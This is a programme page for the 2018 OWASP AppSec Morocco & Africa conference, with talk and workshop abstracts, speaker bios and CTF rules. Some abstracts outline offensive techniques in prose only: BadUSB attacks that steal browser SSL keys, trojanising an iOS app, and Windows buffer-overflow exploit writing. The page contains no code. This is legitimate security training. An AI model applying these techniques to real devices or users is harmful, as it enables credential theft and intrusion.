Welcome to OWASP Annual AppSec Morocco & Africa Cyber Security Conference, the premier application and cyber security conference for African developers and security experts. AppSec Morocco & Africa provides attendees with insight into leading speakers for application security and cyber security, workshops hands-on sessions on various applications, mobile, IoT ICS/SCADA, networking, connections and exposure to the best practices in cybersecurity.
The event has eight conferences and eight different hands-on workshop programs between Thursday 15th and Friday 16th of November 2018.
This is an exceptional opportunity to attend one of the many workshop hands-on courses offered by various well known, industry experts, and future pioneers of the application and cyber security industry.
They are talks, for pen-testers and ethical hackers, developers and security engineers, DevOps practices and GRC/risk level talks for managers and CISOs.
This year's conference program will focus on the bottom to the top and top to the bottom in application security based on the SABSA framework and TOGAF 9 EA framework.
We offer also a Capture The Flag.
Welcome.

10:00 - 10:30 Azzeddine Ramrami

Keynote session: Toward a Safer and More Secure Cyberspace

Given the growing importance of cyberspace to nearly all aspects of national life, a secure cyberspace is vitally important to the nation, but cyberspace is far from secure today.

Toward a Safer and More Secure Cyberspace examines these Internet security vulnerabilities and offers a strategy for future research aimed at countering cyber attacks.

It also explores the nature of online threats and some of the reasons why past research for improving cybersecurity has had less impact than anticipated, and considers the human resource base needed to advance the cybersecurity research agenda.

Author's Bio: Azzeddine RAMRAMI
Azzeddine RAMRAMI is a Senior Security Architect at IBM Security and working as researcher in cyber security at IBM Security X-Force.
Azzeddine RAMRAMI is alos the chapter leader for OWASP Morocco and the president of OWASP Africa.

Coffee Break & Networking

Coffee Break & Networking
You may need to visite our sponsors exhibit booth for product demo, discussion and more while enoying a good moroccan's tea.

DevSecOps is so much more than "automating the scan button." In this talk, we will create a continuous, effective, and scalable DevSecOps pipeline using only *free* tools. We'll use IAST (Interactive Application Security Testing) to accurately pinpoint vulnerabilities in real time without scanning.

Then we'll set up RASP (Runtime Application Self-Protection) to gain comprehensive visibility of attacks in operations and prevent exploits. And we'll integrate all of this security vulnerability and attack telemetry into the tools your teams are already using.

We will enable developers with real-time security feedback right in their IDE

We will also ensure that libraries are frameworks are analyzed continuously for vulnerabilities

We'll integrate security into the CI/CD process so that we can easily fail a build

We'll identify application layer attacks and create a whole new level of visibility for your SOC

We'll even prevent exploitation of newly discovered vulnerabilities in open source libraries

After this talk, you'll be able to establish your own DevSecOps pipeline immediately. This reference architecture can be adapted easily to almost any tools and processes -- even legacy applications and waterfall style projects.

Author's Bio: Rali Kettani

Rali Kettani is a Solutions Architect with Contrast Security, an IAST and RASP company that helps organizations incorporate security at the DevOps speed. He has been in the technology field for over 15 years, with a big chunk of it in application security. Rali has a background in software development with an extensive experience with SAST, IAST and RASP technologies. He has successfully helped dozens of Fortune 500 companies and US government entities to modernize their Application Security practice and switch into DevSecOps.

Rali has a Masters degree in Management Information Systems from the George Washington University and a Bachelor’s degree in Computer Science from the Georgia College. Rali is based out of Washington DC

Offensive Security has long been an esoteric knowledge, discussed in closed circles among select groups, shared as black magic recipes with secret ingredients.
A lot has changed since the days of IRC chat rooms, 0-days exchanges and invite only conferences. Security is now taught at schools, published in books and presented at conferences.

Despite this progress, offensive security is in its most parts a manual process performed by pentesters, bug hunters or weekend enthousiast. Most tools is use both - open source and commercial - are glorified brute forcers that tests large set of inputs hoping to find the one that works.

New Research and progress has however been made in the past few years like:

Introducing techniques from the world of machine learning for fuzzing, like reinforcement learning for input mutation and deep learning for dictionary inference

Enhancing taint tracking for both source code and binary analysis

Tree based testing for black box assessment of web applications

This presentation focuses on the most astonishing progress made in this area, and share our experience implementing and running these techniques to target web, mobile and systems applications as part of the largest security scanning infrastructure in the world. We will present the challenges that software assessment present, like path explosion, formalisation or simply the sheer randomness of the world of web and standards.

Author's Bio: Alaeddine Mesbahi works as a Security Engineer at Google specialized in penetration testing and security source code review.

He is in his own words a Python addict, self-proclaimed green mint tea expert. He enjoys learning new stuff about InfoSec every day, losing at chess and practicing martial arts. Alaeddine holds the Offensive Security Certified Professional (OSCP) and Offensive Security Certified Expert (OSCE) certifications.

Second, why they are critical and vulnerable, and finally the main and critical vulnerabilities that we encountered today on the penetration testing engagements.

I will also present a brief demonstration of the tools and the methodology of a web service pentration testing.Author's Bio: Amine El Boukhari
Amine El Boukhari is a senior cyber security consultant and a penetration tester working at KPMG Paris. He leads a various engagements and had the opportunity to be involved in a lot of web services penetration testing engagements.

Securty is becoming an increasingly important concern during the lifecycle of developing application especially for those using the concept of fast (and furious) continuous delivery, and frequent release cycle.

In this workshop, participants will learn who to easily configure/map security tools to their existing DevOps toolchain, and who to automate this process using cloud-infrastructure automation tools.

The aim is to introduce security controls at the early stage of software development (controls while the developer is coding in his own machine), and before pushing code to the mutualized code repo (version control tool), and finally before (and after) deploying code to the production environment.

The workshop provide also technical demo on how to make sure that initial fixed security requirements are always respected by the production environment through "continuous security monitoring".

Author's Bio: Abdessamad TEMMAR
Abdessamad TEMMAR is an information security consultant at Abcit, a Moroccan firm fully dedicated to information security. He worked through a variety of sources to provide security professional services to clients.

Most of computer users avoid risks coming from removable media throughout performing an antivirus scan or formatting the entire disk, thinking that all viruses are wiped out from the disk located on the mass storage area of the USB.

Security researchers have revealed a vulnerability within some microcontroller on the USB that is hidden from the user, and not accessible by antiviruses and security controls, this hidden area on the USB has been leveraged by criminals and hackers to store malwares to be executed automatically when the USB device is plugged on a computer.

One of the recent techniques mostly used is the USB HID Keyboard attack, this attack makes a USB flash drive impersonating a Human Interface Device (HID) such as keyboard to execute commands automatically and hijack the computer. The same techniques is now applied within smart phones, which extends the risk for end users.

In this workshop, we are going to provide as many as such scenarios with full hands-on demonstrating how computers and phones can easily be exploitable by these reprogrammed firmwares,and how a smart phone can easily be turned on to a rogue device or BadUSB to steal peoples sensitive information like facebook chats and email credentials with SSL turned on.

Our added value in this talk is to represent how we can easily request the browsers (chrome & firefox) to store SSL master keys within a file of our choice that's sent to our gmail account via our installed script deployed by the smart phone, and then easily use those Master keys to eventually decrypt encrypted data.

Author's BIO: Boumediene KADDOUR is a cyber defense consultant, he holds OSCP and OSWP certified. He worked Infosec Thief Trainer before, also as Incident Handler, and Cyber Defense Consultant in Dubai with a company called Malcrove.
He participated in many international Seminars where he animated cyber security talks as professional speaker.

14:00 - 17:30 Workshop 3 – Benjamin NABET

Modifying an official and trusted iOS application to make it malicious

Starting from an official iOS application published on the App Store, we'll learn how to reverse it in order to embeds malicious code and share it. Showing how to dump and decrypt the code (ARM reversing, MACH-O architecture, ...), we'll pass through the basis of debugging on the target (dynamic inspection) to analyze the app and spot the sensitive functions and data. We'll show then how to modify the code, resigning the app and share the malicious version.

Author's Bio: Benjamin NABET - CEO at BESURE (www.bsecure.fr)
Benjamin works in the cybersecurity from 2002. He owns Bsecure, a french company, from 2010 and provides security consultancy for both big companies and SMB. Fond of mobile security, he started in mobile security application since 2009 and helped well known companies in securing their apps.

Capture the Flag Challenges

08:00pm - 08:00am Capture The Flag Details

CTF Start at 8pm on November 15, 2018

The challenge will start on Thursday 15-09-2018 20:00 and end on the next day at 08:00 Moroccan time.

All participants must be physically present at the location of the CTF (Hotel Val d’Infa Casablanca).

Support will be given in person and using a communication channel shared before the beginning of the challenge.

In order to be eligible for the prizes and be a part of the competition, you must abide by the following rules:

Teams are composed of 3 to 5 players

Do not attack the infrastructure. If you find a problem with one of the tasks, please report to it to the organisation team

You are not allowed to attack other them. Any attempt to cheat on the contest will lead to immediate disqualification

Only team members that are present to the CTF location can be part of the contest. Requesting help from members outside of the event location will lead to immediate disqualification

The winner will be the team that collected the maximum point

Requesting hints in private is forbidden. Hints will be shared with all teams

If two teams have equal scores, the team that got to that score first will have the advantage

In order to be eligible for money prizes, the top 3 teams are expected to deliver write-ups. Write-ups will be made public and shared on the OWASP conference website

We reserves the right to disqualify teams if the write-ups are not sufficiently complete

The organisation team of the conference are not allowed to participate to the challenges

Be respectful of other participants and report any misconduct or discrimination

Description : In this Workshop we will look at how to exploit a Buffer Overflows on Windows systems. We will start from the very basics of reverse Engineering of a vulnerable application, discovering the Buffer Overflow issue and writing the exploit for that vulnerable application. Participants will examine various recognized Exploit Writing techniques. They will be led through a series of advanced topics and exercises based on real world and staged application examples to illustrate the concepts.

Prérequis pour le lab : Un PC avec une VM Windows.

Author's BIO: Mohamed Oussama Lessis

Oussema Lessis, is a cyber security manager in EY. He is a Security enthusiast and researcher since an early age. He covered multiple topics including and not limited to :

Description : If you have heard about Docker, containers and kubernetes, but haven't much (or any!) experience yet, this will get you started with a fast-paced.

In this workshop you'll learn :
How to create/modify/intercate with container images
Docker Client and Server running In Single or Distributed mode
Build and publish your own custom images.
Scanning your Image container
Build your own penetration testing lab
Gain basic understanding of Kubernetes Fundamentals
Learn how to use Kubernetes in production
Deploy and manage Docker containers using kubectl
Setup ReplicaSets, Services and Deployments on Kubernetes
Deploy Applications on KubernetesMaterials or downloads needed in advance : https://github.com/etadata/owasp-workshop/blob/master/README.md

Bio: Abdelhalim Souri
Bio: Abdelhalim Souri is a senior security engineer at N+ONE, a leading carrier-neutral datacenter company in Morocco.
His interests include secdevops and studies of how to apply machine learning to detect eventual security flaws.
He also enjoys participating into competitive programming contests.

Securing control systems is a challenge. Off the-shelve software and hardware as well as remote access possibilities in industrial environments increase continuously.
The broader threat landscape and increased sophistication of attacks indicate the need to bolster the security poster of Operational Technology (OT) and in particular industrial control systems (ICS) and SCADA environments. But where to begin?
Workshop Contents:

Author's Bio: Azzeddine RAMRAMI
Azzeddine RAMRAMI is a Senior Security Architect at IBM Security and working as researcher in cyber security at IBM Security X-Force.
Azzeddine RAMRAMI is alos the chapter leader for OWASP Morocco and the President of OWASP Africa.